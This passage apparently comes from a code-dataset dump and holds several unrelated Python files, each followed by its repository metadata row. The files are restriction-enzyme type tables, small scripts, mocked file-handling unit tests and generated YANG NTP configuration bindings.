['Pfl8569I', 'HaeI', 'NspBII', 'SciI', 'LpnI', 'AhaIII', 'Sth302II', 'MstI'],
)
typedict['type68'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Ov5', 'Defined', 'Meth_Dep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['BssHII', 'BsrFI', 'DpnII', 'MluI', 'NgoMIV', 'HpaII', 'TspMI', 'BclI', 'BsaWI', 'SalI', 'MspI', 'Bsu15I', 'NcoI', 'ClaI', 'AgeI', 'XmaI', 'Cfr9I', 'TaqI', 'EaeI', 'AseI', 'AclI', 'ApoI', 'HpyCH4IV', 'NdeI', 'HapII', 'AflII', 'BglII', 'Acc65I', 'MseI', 'BsaHI', 'XbaI', 'MboI', 'CviQI', 'NheI', 'Sau3AI', 'BsiWI', 'CviAII', 'MfeI', 'ApaLI', 'Cfr10I', 'HinP1I', 'HspAI', 'HindIII', 'EcoRI', 'XhoI', 'BseCI', 'AccIII', 'MunI', 'EagI', 'AscI', 'VspI', 'KasI', 'Kpn2I', 'SgrAI', 'BspHI', 'BstYI', 'Sse9I', 'NotI', 'FatI', 'BamHI', 'PaeR7I'],
)
typedict['type77'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Ov5', 'Defined', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['XmaIII', 'CfrI', 'XhoII'],
)
typedict['type78'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Ov5', 'Defined', 'Meth_Undep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['BssMI', 'AsuNHI', 'PshBI', 'BshTI', 'CciI', 'MreI', 'AhlI', 'XspI', 'KroI', 'BfaI', 'PauI', 'Asp718I', 'VneI', 'PspXI', 'AsiGI', 'CciNI', 'Sfr274I', 'PteI', 'Ksp22I', 'Bsp19I', 'MauBI', 'AbsI', 'AsuII', 'FauNDI', 'Vha464I', 'BstACI', 'AcoI', 'BstMBI', 'BssAI', 'BseAI', 'Hin6I', 'PalAI', 'BstAUI', 'Bpu14I', 'Eco52I', 'BspT104I', 'SspDI', 'TasI', 'AcsI', 'BseX3I', 'FspBI', 'RsaNI', 'AvrII', 'MaeI', 'XapI', 'PscI', 'Bsp1407I', 'SspMI', 'PciI', 'Bse118I', 'NarI', 'BsePI', 'MaeII', 'Bsp13I', 'BsiSI', 'Bsp119I', 'BstX2I', 'SlaI', 'SgsI', 'MluCI', 'PsuI', 'AspA2I', 'BcuI', 'BspTI', 'SpeI', 'Mly113I', 'MflI', 'BshVI', 'Hin1I', 'SgrDI', 'MroNI', 'XmaJI', 'MspCI', 'Psp1406I', 'Kzo9I', 'Csp6I', 'Bsp143I', 'Bsa29I', 'Tru1I', 'Aor13HI', 'PinAI', 'EclXI', 'BspEI', 'BstZI', 'Alw44I', 'Hsp92I', 'BlnI', 'NdeII', 'BsrGI', 'CspAI', 'FbaI', 'PspOMI', 'SaqAI', 'SfuI', 'NspV', 'BfrI', 'BstBI', 'BssNI', 'HpySE526I', 'Tru9I', 'Bsp120I', 'MroI', 'AoxI', 'AcyI', 'BsuTUI', 'BspDI', 'BstAFI', 'TatI', 'Pfl23II', 'PspLI', 'PagI'],
)
typedict['type79'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Ov5', 'Defined', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['SelI', 'BspLU11I', 'SplI', 'TspEI', 'Asi256I', 'Ppu10I', 'Sse232I', 'BetI', 'BspMII'],
)
typedict['type80'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Ov5', 'Ambiguous', 'Meth_Dep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['PspPI', 'AspS9I', 'StyD4I', 'PspGI', 'PpuMI', 'BsoBI', 'BlpI', 'BssECI', 'AjnI', 'AvaI', 'SexAI', 'SinI', 'Sau96I', 'BstNI', 'Cfr13I', 'TseI', 'SmlI', 'MvaI', 'Bsu36I', 'AflIII', 'TfiI', 'BanI', 'RsrII', 'BcnI', 'ScrFI', 'EcoRII', 'EcoNI', 'ApeKI', 'HinfI', 'NciI', 'Fsp4HI', 'EcoO109I', 'Tth111I', 'AccI', 'DdeI', 'AvaII', 'BsaJI', 'Fnu4HI', 'Tsp45I', 'StyI'],
)
typedict['type81'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Ov5', 'Ambiguous', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['HgiCI', 'EcoHI'],
)
typedict['type82'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Ov5', 'Ambiguous', 'Meth_Undep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['AxyI', 'BspT107I', 'PspEI', 'BisI', 'BstPI', 'BstSFI', 'BstEII', 'BmgT120I', 'BssT1I', 'PsyI', 'BtgI', 'Eco91I', 'Bst2UI', 'BstDEI', 'GluI', 'BstENI', 'Ama87I', 'BstDSI', 'PflFI', 'Bme1390I', 'Psp5II', 'EcoO65I', 'BmrFI', 'EcoT14I', 'PspPPI', 'BseBI', 'PfoI', 'BshNI', 'Rsr2I', 'BmeT110I', 'PasI', 'TseFI', 'CpoI', 'Eco130I', 'CspI', 'BfmI', 'Eco47I', 'Bme18I', 'MabI', 'Hpy188III', 'Bse21I', 'BstSCI', 'BpuMI', 'SgeI', 'XagI', 'SmoI', 'Bsp1720I', 'MaeIII', 'ErhI', 'AsuC2I', 'BsiHKCI', 'MspR9I', 'XmiI', 'VpaK11BI', 'PfeI', 'Bpu1102I', 'SfcI', 'SatI', 'BciT130I', 'KflI', 'BseDI', 'Eco81I', 'Eco88I', 'FblI', 'AccB1I', 'CsiI', 'MteI', 'Psp6I', 'HpyF3I', 'NmuCI'],
)
typedict['type83'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Ov5', 'Ambiguous', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['SanDI', 'DsaI', 'SauI', 'DraII', 'UnbI', 'VpaK11AI', 'Hpy178III', 'SfeI', 'CauII', 'AsuI', 'SecI', 'EspI', 'Sse8647I'],
)
typedict['type84'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Ov3', 'Defined', 'Meth_Dep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['SacI', 'KpnI', 'HaeII', 'SacII', 'AatII', 'PluTI', 'NlaIII', 'PstI', 'Cfr42I', 'FseI', 'ApaI', 'NspI', 'HhaI', 'AsiSI'],
)
typedict['type89'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Ov3', 'Defined', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['PabI', 'McaTI'],
)
typedict['type90'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Ov3', 'Defined', 'Meth_Undep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['SgrBI', 'BstHHI', 'BstH2I', 'BmtI', 'Mph1103I', 'PvuI', 'BspOI', 'AspLEI', 'Zsp2I', 'PacI', 'FaeI', 'SdaI', 'BstNSI', 'Ple19I', 'Hin1II', 'Sse8387I', 'PaeI', 'TaiI', 'Hsp92II', 'Psp124BI', 'Sfr303I', 'CfoI', 'BstKTI', 'SstI', 'SphI', 'SfaAI', 'RgaI', 'SgfI', 'SbfI', 'BspMAI', 'XceI', 'NsiI', 'EcoT22I', 'KspI', 'BfoI', 'RigI'],
)
typedict['type91'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Ov3', 'Defined', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['ChaI', 'MspGI'],
)
typedict['type92'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Ov3', 'Ambiguous', 'Meth_Dep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['AgsI', 'MwoI', 'EcoT38I', 'BglI', 'BanII', 'Hpy99I', 'BstXI', 'BaeGI', 'Hpy188I', 'Bsc4I', 'TspRI', 'DraIII', 'Bsp1286I', 'AhdI', 'SfiI', 'XcmI', 'BstAPI', 'BslI'],
)
typedict['type93'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Ov3', 'Ambiguous', 'Meth_Dep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['BthCI', 'HauII'],
)
typedict['type94'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Ov3', 'Ambiguous', 'Meth_Undep', 'Commercially_available', 'AbstractCut', 'RestrictionType'),
['AlwNI', 'DrdI', 'TscAI', 'Eco24I', 'BsiHKAI', 'BseSI', 'Van91I', 'DseDI', 'SetI', 'BmeRI', 'TaaI', 'BstMCI', 'HpyF10VI', 'Bst4CI', 'SduI', 'Alw21I', 'AccB7I', 'AdeI', 'BsiEI', 'BseLI', 'FriOI', 'AasI', 'Eam1105I', 'TauI', 'AfiI', 'CaiI', 'Bbv12I', 'HpyCH4III', 'BstSLI', 'BlsI', 'PcsI', 'BstMWI', 'PstNI', 'PkrI', 'MhlI', 'DriI', 'Bsh1285I', 'PflMI'],
)
typedict['type95'] = _temp()
def _temp():
return (
('Palindromic', 'OneCut', 'Ov3', 'Ambiguous', 'Meth_Undep', 'Not_available', 'AbstractCut', 'RestrictionType'),
['Nli3877I', 'Psp03I', 'BsiYI', 'ApaBI', 'Tsp4CI', 'FmuI', 'McrI', 'HgiJII', 'PssI', 'HgiAI'],
)
typedict['type96'] = _temp()
del _temp
| 21.769057 | 2,331 | 0.411553 | 54,567 | 538,893 | 3.964337 | 0.038613 | 0.050813 | 0.061778 | 0.080551 | 0.814143 | 0.80554 | 0.797214 | 0.755018 | 0.731964 | 0.654261 | 0 | 0.062543 | 0.357854 | 538,893 | 24,754 | 2,332 | 21.769936 | 0.562578 | 0.001329 | 0 | 0.807149 | 0 | 0.004996 | 0.306574 | 0.057405 | 0 | 0 | 0 | 0 | 0 | 1 | 0.049862 | false | 0 | 0 | 0.049862 | 0.099724 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
d4e9b8d820f7cbdd6bee6916235ae29d6bcb299b | 49 | py | Python | tests/src/trivia/procGT.py | lindlind/python-interpreter | ffcb38627dc128dddb04e769d0bff6466365271a | [
"MIT"
] | null | null | null | tests/src/trivia/procGT.py | lindlind/python-interpreter | ffcb38627dc128dddb04e769d0bff6466365271a | [
"MIT"
] | null | null | null | tests/src/trivia/procGT.py | lindlind/python-interpreter | ffcb38627dc128dddb04e769d0bff6466365271a | [
"MIT"
] | null | null | null | "abc" > "abc"
42 > 42
13.37 > 13.37
True > False
| 9.8 | 13 | 0.55102 | 10 | 49 | 2.7 | 0.6 | 0.296296 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.324324 | 0.244898 | 49 | 4 | 14 | 12.25 | 0.405405 | 0 | 0 | 0 | 0 | 0 | 0.122449 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
be1472463b482ccc2507dc89bb7a79b789c07ab2 | 95 | py | Python | locate/__init__.py | heetbeet/locate | cc36fb10937847a97e421c3c6767876821fb9a7d | [
"MIT"
] | 2 | 2021-01-11T15:04:25.000Z | 2021-07-15T08:03:48.000Z | locate/__init__.py | heetbeet/locate | cc36fb10937847a97e421c3c6767876821fb9a7d | [
"MIT"
] | null | null | null | locate/__init__.py | heetbeet/locate | cc36fb10937847a97e421c3c6767876821fb9a7d | [
"MIT"
] | null | null | null | from .locate import this_dir, allow_relative_location_imports, force_relative_location_imports
| 47.5 | 94 | 0.905263 | 13 | 95 | 6.076923 | 0.769231 | 0.405063 | 0.582278 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.063158 | 95 | 1 | 95 | 95 | 0.88764 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
0778df7f82fb56caf016a1f31b53683d64857d4a | 2,443 | py | Python | scripts/tests/test_files_to_import_structure.py | gaybro8777/osf.io | 30408511510a40bc393565817b343ef5fd76ab14 | [
"Apache-2.0"
] | 628 | 2015-01-15T04:33:22.000Z | 2022-03-30T06:40:10.000Z | scripts/tests/test_files_to_import_structure.py | gaybro8777/osf.io | 30408511510a40bc393565817b343ef5fd76ab14 | [
"Apache-2.0"
] | 4,712 | 2015-01-02T01:41:53.000Z | 2022-03-30T14:18:40.000Z | scripts/tests/test_files_to_import_structure.py | Johnetordoff/osf.io | de10bf249c46cede04c78f7e6f7e352c69e6e6b5 | [
"Apache-2.0"
] | 371 | 2015-01-12T16:14:08.000Z | 2022-03-31T18:58:29.000Z | # -*- coding: utf-8 -*-
import mock
from tests.base import OsfTestCase
from scripts.EGAP.files_to_import_structure import action_files_by_name
class TestEGAPFilesToImportStructure(OsfTestCase):
@mock.patch('scripts.EGAP.files_to_import_structure.os.mkdir')
@mock.patch('scripts.EGAP.files_to_import_structure.shutil.move')
def test_doesnt_move_nonanon_files(self, mock_move, mock_mkdir):
action_files_by_name(
'scripts/tests/test_files/20151016AA/data/datatest_nonanonymous',
'scripts/tests/test_files/20151016AA/data/test_nonanonymous/20151016AA_PAP.pdf',
'20151016AA_PAP.pdf'
)
assert not mock_mkdir.called
assert not mock_move.called
@mock.patch('scripts.EGAP.files_to_import_structure.os.mkdir')
@mock.patch('scripts.EGAP.files_to_import_structure.shutil.move')
def test_moves_anon_files(self, mock_move, mock_mkdir):
action_files_by_name(
'scripts/tests/test_files/20151016AA/data/test_nonanonymous',
'scripts/tests/test_files/20151016AA/data/test_nonanonymous/20151016AA_anonymous.pdf',
'20151016AA_anonymous.pdf'
)
mock_mkdir.assert_called_with('scripts/tests/test_files/20151016AA/data/anonymous')
mock_move.assert_called_with(
'scripts/tests/test_files/20151016AA/data/test_nonanonymous/20151016AA_anonymous.pdf',
'scripts/tests/test_files/20151016AA/data/anonymous/20151016AA_anonymous.pdf'
)
@mock.patch('scripts.EGAP.files_to_import_structure.os.remove')
def test_removes_no_id(self, mock_remove):
action_files_by_name(
'scripts/tests/test_files/20151016AA/data/test_nonanonymous',
'scripts/tests/test_files/20151016AA/data/test_nonanonymous/justafile.pdf',
'justafile.pdf'
)
mock_remove.assert_called_with('scripts/tests/test_files/20151016AA/data/test_nonanonymous/justafile.pdf')
@mock.patch('scripts.EGAP.files_to_import_structure.os.remove')
def test_removes_form(self, mock_remove):
action_files_by_name(
'scripts/tests/test_files/20151016AA/data/test_nonanonymous',
'scripts/tests/test_files/20151016AA/data/test_nonanonymous/20151016AA_FORM.pdf',
'20151016AA_FORM.pdf'
)
mock_remove.assert_called_with('scripts/tests/test_files/20151016AA/data/test_nonanonymous/20151016AA_FORM.pdf')
| 43.625 | 120 | 0.733115 | 302 | 2,443 | 5.596026 | 0.15894 | 0.092308 | 0.123077 | 0.161538 | 0.813609 | 0.813609 | 0.794083 | 0.762722 | 0.762722 | 0.732544 | 0 | 0.087021 | 0.167417 | 2,443 | 55 | 121 | 44.418182 | 0.743854 | 0.008596 | 0 | 0.348837 | 0 | 0 | 0.523967 | 0.503306 | 0 | 0 | 0 | 0 | 0.139535 | 1 | 0.093023 | false | 0 | 0.232558 | 0 | 0.348837 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
0790354b70f79804b7c1391fb9dd7e87f11cc3bf | 17,929 | py | Python | pybind/nos/v7_1_0/ntp/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/nos/v7_1_0/ntp/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | null | null | null | pybind/nos/v7_1_0/ntp/__init__.py | shivharis/pybind | 4e1c6d54b9fd722ccec25546ba2413d79ce337e6 | [
"Apache-2.0"
] | 1 | 2021-11-05T22:15:42.000Z | 2021-11-05T22:15:42.000Z |
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
import server
import authentication_key
class ntp(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-ntp - based on the path /ntp. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__server','__authentication_key','__source_ip',)
_yang_name = 'ntp'
_rest_name = 'ntp'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__authentication_key = YANGDynClass(base=YANGListType("keyid",authentication_key.authentication_key, yang_name="authentication-key", rest_name="authentication-key", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='keyid', extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'authentication key', u'cli-no-key-completion': None, u'cli-suppress-mode': None, u'sort-priority': u'30', u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-suppress-key-abbreviation': None, u'cli-incomplete-command': None, u'callpoint': u'ntp-key'}}), is_container='list', yang_name="authentication-key", rest_name="authentication-key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'authentication key', u'cli-no-key-completion': None, u'cli-suppress-mode': None, u'sort-priority': u'30', u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-suppress-key-abbreviation': None, u'cli-incomplete-command': None, u'callpoint': u'ntp-key'}}, namespace='urn:brocade.com:mgmt:brocade-ntp', defining_module='brocade-ntp', yang_type='list', is_config=True)
self.__source_ip = YANGDynClass(base=RestrictedClassType(base_type=unicode, restriction_type="dict_key", restriction_arg={u'chassis-ip': {'value': 1}, u'mm-ip': {'value': 2}},), default=unicode("mm-ip"), is_leaf=True, yang_name="source-ip", rest_name="source-ip", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'info': u'Configure the source ip to be used for NTP', u'cli-full-command': None, u'callpoint': u'ntp_srcip_cp'}}, namespace='urn:brocade.com:mgmt:brocade-ntp', defining_module='brocade-ntp', yang_type='srcip_type', is_config=True)
self.__server = YANGDynClass(base=YANGListType("ip use_vrf",server.server, yang_name="server", rest_name="server", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='ip use-vrf', extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'Configure NTP server', u'cli-suppress-mode': None, u'sort-priority': u'31', u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'ntp-server'}}), is_container='list', yang_name="server", rest_name="server", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'Configure NTP server', u'cli-suppress-mode': None, u'sort-priority': u'31', u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'ntp-server'}}, namespace='urn:brocade.com:mgmt:brocade-ntp', defining_module='brocade-ntp', yang_type='list', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'ntp']
def _rest_path(self):
if hasattr(self, "_parent"):
if self._rest_name:
return self._parent._rest_path()+[self._rest_name]
else:
return self._parent._rest_path()
else:
return [u'ntp']
def _get_server(self):
"""
Getter method for server, mapped from YANG variable /ntp/server (list)
"""
return self.__server
def _set_server(self, v, load=False):
"""
Setter method for server, mapped from YANG variable /ntp/server (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_server is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_server() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("ip use_vrf",server.server, yang_name="server", rest_name="server", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='ip use-vrf', extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'Configure NTP server', u'cli-suppress-mode': None, u'sort-priority': u'31', u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'ntp-server'}}), is_container='list', yang_name="server", rest_name="server", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'Configure NTP server', u'cli-suppress-mode': None, u'sort-priority': u'31', u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'ntp-server'}}, namespace='urn:brocade.com:mgmt:brocade-ntp', defining_module='brocade-ntp', yang_type='list', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """server must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("ip use_vrf",server.server, yang_name="server", rest_name="server", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='ip use-vrf', extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'Configure NTP server', u'cli-suppress-mode': None, u'sort-priority': u'31', u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'ntp-server'}}), is_container='list', yang_name="server", rest_name="server", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'Configure NTP server', u'cli-suppress-mode': None, u'sort-priority': u'31', u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'ntp-server'}}, namespace='urn:brocade.com:mgmt:brocade-ntp', defining_module='brocade-ntp', yang_type='list', is_config=True)""",
})
self.__server = t
if hasattr(self, '_set'):
self._set()
def _unset_server(self):
self.__server = YANGDynClass(base=YANGListType("ip use_vrf",server.server, yang_name="server", rest_name="server", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='ip use-vrf', extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'Configure NTP server', u'cli-suppress-mode': None, u'sort-priority': u'31', u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'ntp-server'}}), is_container='list', yang_name="server", rest_name="server", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'Configure NTP server', u'cli-suppress-mode': None, u'sort-priority': u'31', u'cli-suppress-list-no': None, u'cli-suppress-key-abbreviation': None, u'callpoint': u'ntp-server'}}, namespace='urn:brocade.com:mgmt:brocade-ntp', defining_module='brocade-ntp', yang_type='list', is_config=True)
def _get_authentication_key(self):
"""
Getter method for authentication_key, mapped from YANG variable /ntp/authentication_key (list)
"""
return self.__authentication_key
def _set_authentication_key(self, v, load=False):
"""
Setter method for authentication_key, mapped from YANG variable /ntp/authentication_key (list)
If this variable is read-only (config: false) in the
source YANG file, then _set_authentication_key is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_authentication_key() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=YANGListType("keyid",authentication_key.authentication_key, yang_name="authentication-key", rest_name="authentication-key", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='keyid', extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'authentication key', u'cli-no-key-completion': None, u'cli-suppress-mode': None, u'sort-priority': u'30', u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-suppress-key-abbreviation': None, u'cli-incomplete-command': None, u'callpoint': u'ntp-key'}}), is_container='list', yang_name="authentication-key", rest_name="authentication-key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'authentication key', u'cli-no-key-completion': None, u'cli-suppress-mode': None, u'sort-priority': u'30', u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-suppress-key-abbreviation': None, u'cli-incomplete-command': None, u'callpoint': u'ntp-key'}}, namespace='urn:brocade.com:mgmt:brocade-ntp', defining_module='brocade-ntp', yang_type='list', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """authentication_key must be of a type compatible with list""",
'defined-type': "list",
'generated-type': """YANGDynClass(base=YANGListType("keyid",authentication_key.authentication_key, yang_name="authentication-key", rest_name="authentication-key", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='keyid', extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'authentication key', u'cli-no-key-completion': None, u'cli-suppress-mode': None, u'sort-priority': u'30', u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-suppress-key-abbreviation': None, u'cli-incomplete-command': None, u'callpoint': u'ntp-key'}}), is_container='list', yang_name="authentication-key", rest_name="authentication-key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'authentication key', u'cli-no-key-completion': None, u'cli-suppress-mode': None, u'sort-priority': u'30', u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-suppress-key-abbreviation': None, u'cli-incomplete-command': None, u'callpoint': u'ntp-key'}}, namespace='urn:brocade.com:mgmt:brocade-ntp', defining_module='brocade-ntp', yang_type='list', is_config=True)""",
})
self.__authentication_key = t
if hasattr(self, '_set'):
self._set()
def _unset_authentication_key(self):
self.__authentication_key = YANGDynClass(base=YANGListType("keyid",authentication_key.authentication_key, yang_name="authentication-key", rest_name="authentication-key", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='keyid', extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'authentication key', u'cli-no-key-completion': None, u'cli-suppress-mode': None, u'sort-priority': u'30', u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-suppress-key-abbreviation': None, u'cli-incomplete-command': None, u'callpoint': u'ntp-key'}}), is_container='list', yang_name="authentication-key", rest_name="authentication-key", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'cli-suppress-key-sort': None, u'info': u'authentication key', u'cli-no-key-completion': None, u'cli-suppress-mode': None, u'sort-priority': u'30', u'cli-suppress-list-no': None, u'cli-full-no': None, u'cli-compact-syntax': None, u'cli-suppress-key-abbreviation': None, u'cli-incomplete-command': None, u'callpoint': u'ntp-key'}}, namespace='urn:brocade.com:mgmt:brocade-ntp', defining_module='brocade-ntp', yang_type='list', is_config=True)
def _get_source_ip(self):
"""
Getter method for source_ip, mapped from YANG variable /ntp/source_ip (srcip_type)
"""
return self.__source_ip
def _set_source_ip(self, v, load=False):
"""
Setter method for source_ip, mapped from YANG variable /ntp/source_ip (srcip_type)
If this variable is read-only (config: false) in the
source YANG file, then _set_source_ip is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_source_ip() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
